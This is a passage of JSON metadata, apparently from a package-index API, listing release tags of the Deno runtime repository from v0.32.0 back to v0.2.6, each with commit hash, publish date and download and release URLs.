0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.eco